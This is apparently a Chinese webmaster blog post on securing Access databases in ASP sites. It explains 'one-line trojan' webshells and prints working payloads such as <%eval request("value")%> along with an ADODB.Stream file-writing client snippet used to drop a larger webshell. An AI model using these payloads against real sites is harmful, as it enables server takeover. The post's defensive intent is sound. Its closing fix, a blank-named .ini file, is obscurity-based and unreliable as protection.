来说说Acc类型的数据库吧....各位站长是否关注过它的安全呢?

有人可能会说.....mdb的数据库修改一下名字就很简单了.....网上有很多的防下载文章.....随便找一个用上 了   看似就很安全了....
其实不然.....


acc数据库防下载的文章太多了    

比如修改一个很复杂的名字...

  1. wwwroot/mdb/5498!@#!@#!.mdb
复制代码
可是大家知道么?这样一样可以被下载...

还有的人是这样做的...     修改.mdb为.asp

这是个更愚蠢的做法....黑客完全可以利用网站的留言板  或者回复功能 把一句话木马插入数据库....

进入正题...来给大家普及一下一句话木马的知识吧!!
----------------------------------------------------------邪恶分割线--------------------------------------------------------

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
  1. <%execute request("value")%>
复制代码
  1. <%eval request("value")%>
复制代码
(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)
这就被称为一句话木马,它是基于B/S结构的。
记住!黑客的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!甚至加密过的也算...只要可以执行!
----------------------------------------------------------邪恶分割线--------------------------------------------------------
句话木马原理

首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码:
  1.   <textarea name=# cols="80" rows="10">
  2.   set iP=server.createObject("Adodb.Stream")
  3.   iP.Open
  4.   iP.Type=2
  5.   iP.CharSet="gb2312"
  6.   iP.writetext request("aoyun")
  7.   iP.SaveToFile server.mappath("aoyunwan.asp"),2
  8.   iP.Close
  9.   set iP=nothing
  10.   response.redirect "aoyunwan.asp"
  11.   </textarea>
复制代码
学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:
  1.   set iP=server.createObject("Adodb.Stream")
  2.   iP.Open
  3.   iP.Type=2
  4.   iP.CharSet="gb2312"
  5.   iP.writetext request("aoyun")
  6.   iP.SaveToFile server.mappath("aoyunwan.asp"),2
  7.   iP.Close
  8.   set iP=nothing
  9.   response.redirect "aoyunwan.asp"
复制代码
学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp
文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect "aoyunwan.asp" 转向写入的文件,就是我们最后见的大马了!

一句话木马添加成功的标志!

比如一个黑客成功添加了一句号木马到数据库中....而且站长把mdb格式修改成了asp格式...

如果一句话木马添加成功了   访问数据库地址数据库路径   例如:www.lanseyousi.com/mdb/sjk.asp
就会出现
  1.   Script error detected at line 1.
  2.   Source line: execute request("nettoo")
  3.   Description: 类型不匹配: 'execute'
复制代码
这样的提示  就说明了一句话木马添加成了

那么你的网站现在已经不属于你了....黑客可以溢出得到权限.....修改你的主页  挂上木马



----------------------------------------------------------邪恶分割线--------------------------------------------------------


说白了.....一句话木马就是一句可以执行任何命令的漏洞.....    虽然网站没有漏洞
阴差阳错的asp格式数据库  和可以执行的权限....造成了整个网站的沦陷.!!



----------------------------------------------------------邪恶分割线--------------------------------------------------------


给大家总结一个我自己发展的防下载  而且防止执行一句话木马的方法
我自己的网站就是用这样方法的....我可以高速大家我的数据库地址.....当然如果你能入侵我的网站  那么....我佩服你....
http://www.lanseyousi.com/DATA/.ini

解决方法如下:
1. 修改数据库文件名为空....
2.修改文件扩展名为 .ini  
给大家上个图片演示....
TM截图未命名.jpg 
这样设置后 黑客即下载不了我们的数据库....而且没有执行一句话木马的机会......

原文地址:http://www.lanseyousi.com/logs/YuanChuangLaiShuoShuoZuiJiBenDeAccShuJuKuDeAnQuanWenTi.html